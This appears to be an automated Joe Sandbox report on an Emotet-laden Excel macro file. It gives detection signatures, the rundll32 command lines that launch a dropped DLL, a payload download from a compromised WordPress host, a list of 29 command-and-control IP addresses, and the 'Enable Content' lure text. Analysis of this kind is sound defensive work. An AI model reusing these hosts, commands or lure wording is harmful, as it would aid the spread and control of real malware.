Loading ...

Play interactive tourEdit tour

Windows Analysis Report FILE_915494026923219.xlsm

Overview

General Information

Sample Name:FILE_915494026923219.xlsm
Analysis ID:532440
MD5:9eb8e0e5691ff59e86077c878feabc88
SHA1:5c1c11b3c2abbf960616710cb780ca3489d64809
SHA256:91c6ece37265eecefed9274abfacb57b4146166628f04f0674d3f14fc6bb4b09
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Emotet RunDLL32 Process Creation
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for domain / URL
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2064 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • rundll32.exe (PID: 2700 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 804 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.588333443.00000000002F0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000003.00000002.588398345.000000000041D000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000006.00000002.740442546.000000000046D000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.rundll32.exe.480de0.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            3.2.rundll32.exe.430ce0.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.rundll32.exe.2f0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                6.2.rundll32.exe.480de0.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.rundll32.exe.2f0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    Click to see the 1 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Emotet RunDLL32 Process CreationShow sources
                    Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2700, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, ProcessId: 804
                    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2064, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435, ProcessId: 2700

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 6.2.rundll32.exe.480de0.1.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: FILE_915494026923219.xlsmReversingLabs: Detection: 22%
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: escapelle.uzVirustotal: Detection: 5%Perma Link
                    Source: www.escapelle.uzVirustotal: Detection: 6%Perma Link
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: unknownHTTPS traffic detected: 62.209.128.105:443 -> 192.168.2.22:49167 version: TLS 1.2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43BA20 FindFirstFileExW,

                    Software Vulnerabilities:

                    barindex
                    Document exploit detected (drops PE files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: gb[1].dll.0.drJump to dropped file
                    Document exploit detected (creates forbidden files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gb[1].dllJump to behavior
                    Document exploit detected (process start blacklist hit)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
                    Document exploit detected (UrlDownloadToFile)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                    Source: global trafficDNS query: name: www.escapelle.uz
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 62.209.128.105:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 62.209.128.105:443

                    Networking:

                    barindex
                    C2 URLs / IPs found in malware configurationShow sources
                    Source: Malware configuration extractorIPs: 46.55.222.11:443
                    Source: Malware configuration extractorIPs: 104.245.52.73:8080
                    Source: Malware configuration extractorIPs: 41.76.108.46:8080
                    Source: Malware configuration extractorIPs: 103.8.26.103:8080
                    Source: Malware configuration extractorIPs: 185.184.25.237:8080
                    Source: Malware configuration extractorIPs: 103.8.26.102:8080
                    Source: Malware configuration extractorIPs: 203.114.109.124:443
                    Source: Malware configuration extractorIPs: 45.118.115.99:8080
                    Source: Malware configuration extractorIPs: 178.79.147.66:8080
                    Source: Malware configuration extractorIPs: 58.227.42.236:80
                    Source: Malware configuration extractorIPs: 45.118.135.203:7080
                    Source: Malware configuration extractorIPs: 103.75.201.2:443
                    Source: Malware configuration extractorIPs: 195.154.133.20:443
                    Source: Malware configuration extractorIPs: 45.142.114.231:8080
                    Source: Malware configuration extractorIPs: 212.237.5.209:443
                    Source: Malware configuration extractorIPs: 207.38.84.195:8080
                    Source: Malware configuration extractorIPs: 104.251.214.46:8080
                    Source: Malware configuration extractorIPs: 212.237.17.99:8080
                    Source: Malware configuration extractorIPs: 212.237.56.116:7080
                    Source: Malware configuration extractorIPs: 216.158.226.206:443
                    Source: Malware configuration extractorIPs: 110.232.117.186:8080
                    Source: Malware configuration extractorIPs: 158.69.222.101:443
                    Source: Malware configuration extractorIPs: 107.182.225.142:8080
                    Source: Malware configuration extractorIPs: 176.104.106.96:8080
                    Source: Malware configuration extractorIPs: 81.0.236.90:443
                    Source: Malware configuration extractorIPs: 50.116.54.215:443
                    Source: Malware configuration extractorIPs: 138.185.72.26:8080
                    Source: Malware configuration extractorIPs: 51.68.175.8:8080
                    Source: Malware configuration extractorIPs: 210.57.217.132:8080
                    Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                    Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                    Source: Joe Sandbox ViewIP Address: 212.237.17.99 212.237.17.99
                    Source: global trafficHTTP traffic detected: GET /wp-includes/n1vS/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.escapelle.uzConnection: Keep-Alive
                    Source: unknownNetwork traffic detected: IP country count 19
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                    Source: EXCEL.EXE, 00000000.00000003.527130842.0000000005971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746656953.0000000005973000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                    Source: EXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: EXCEL.EXE, 00000000.00000003.527130842.0000000005971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746656953.0000000005973000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746951484.00000000059CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527198087.00000000059D7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: EXCEL.EXE, 00000000.00000002.746951484.00000000059CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527198087.00000000059D7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: EXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
                    Source: EXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
                    Source: EXCEL.EXE, 00000000.00000002.745207198.0000000005247000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588579301.0000000002047000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740860352.0000000002047000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                    Source: EXCEL.EXE, 00000000.00000002.745207198.0000000005247000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588579301.0000000002047000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740860352.0000000002047000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                    Source: EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: EXCEL.EXE, 00000000.00000002.746951484.00000000059CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527198087.00000000059D7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: EXCEL.EXE, 00000000.00000002.746951484.00000000059CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527198087.00000000059D7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: EXCEL.EXE, 00000000.00000002.748794538.0000000007076000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.748830176.0000000007226000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.748879315.0000000007316000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.748858460.0000000007266000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
                    Source: EXCEL.EXE, 00000000.00000002.748830176.0000000007226000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
                    Source: EXCEL.EXE, 00000000.00000002.748794538.0000000007076000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
                    Source: EXCEL.EXE, 00000000.00000002.748879315.0000000007316000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.748858460.0000000007266000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
                    Source: EXCEL.EXE, 00000000.00000002.745207198.0000000005247000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588579301.0000000002047000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740860352.0000000002047000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                    Source: EXCEL.EXE, 00000000.00000002.745207198.0000000005247000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588579301.0000000002047000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740860352.0000000002047000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: EXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
                    Source: EXCEL.EXE, 00000000.00000002.745207198.0000000005247000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588579301.0000000002047000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740860352.0000000002047000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                    Source: EXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
                    Source: EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746951484.00000000059CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527198087.00000000059D7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: EXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.u
                    Source: EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/)
                    Source: EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/1
                    Source: EXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/w
                    Source: EXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/wp-in
                    Source: EXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/wp-incl
                    Source: EXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/wp-includ$https://www.escapelle.uz/wp-includes
                    Source: EXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/wp-includes/n1
                    Source: EXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/wp-includes/n1vS/
                    Source: EXCEL.EXE, 00000000.00000002.744930207.0000000004F56000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/wp-includes/n1vS/D
                    Source: EXCEL.EXE, 00000000.00000002.744930207.0000000004F56000.00000004.00000001.sdmpString found in binary or memory: https://www.escapelle.uz/wp-includes/n1vS/a
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3326FDF8.pngJump to behavior
                    Source: unknownDNS traffic detected: queries for: www.escapelle.uz
                    Source: global trafficHTTP traffic detected: GET /wp-includes/n1vS/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.escapelle.uzConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 62.209.128.105:443 -> 192.168.2.22:49167 version: TLS 1.2

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 6.2.rundll32.exe.480de0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.430ce0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.rundll32.exe.480de0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.430ce0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.588333443.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.588398345.000000000041D000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.740442546.000000000046D000.00000004.00000020.sdmp, type: MEMORY

                    System Summary:

                    barindex
                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
                    Source: Screenshot number: 4Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
                    Source: Screenshot number: 4Screenshot OCR: Enable Content" button 6 7 8 9 :: 12 13 14 15 16 17 18 q ^ Ly 20 21 22 23 24 2
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
                    Source: Document image extraction number: 0Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
                    Source: Document image extraction number: 0Screenshot OCR: Enable Content" button
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
                    Source: Document image extraction number: 1Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
                    Source: Document image extraction number: 1Screenshot OCR: Enable Content" button
                    Office process drops PE fileShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gb[1].dllJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6743
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6340
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6753
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E66E8
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E66F3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003106EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030ED95
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00300A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030CC3F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00300824
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F3E3B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FF20D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00301C12
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00312C16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030BA18
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00311C71
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030E478
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00310C66
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030645F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030604E
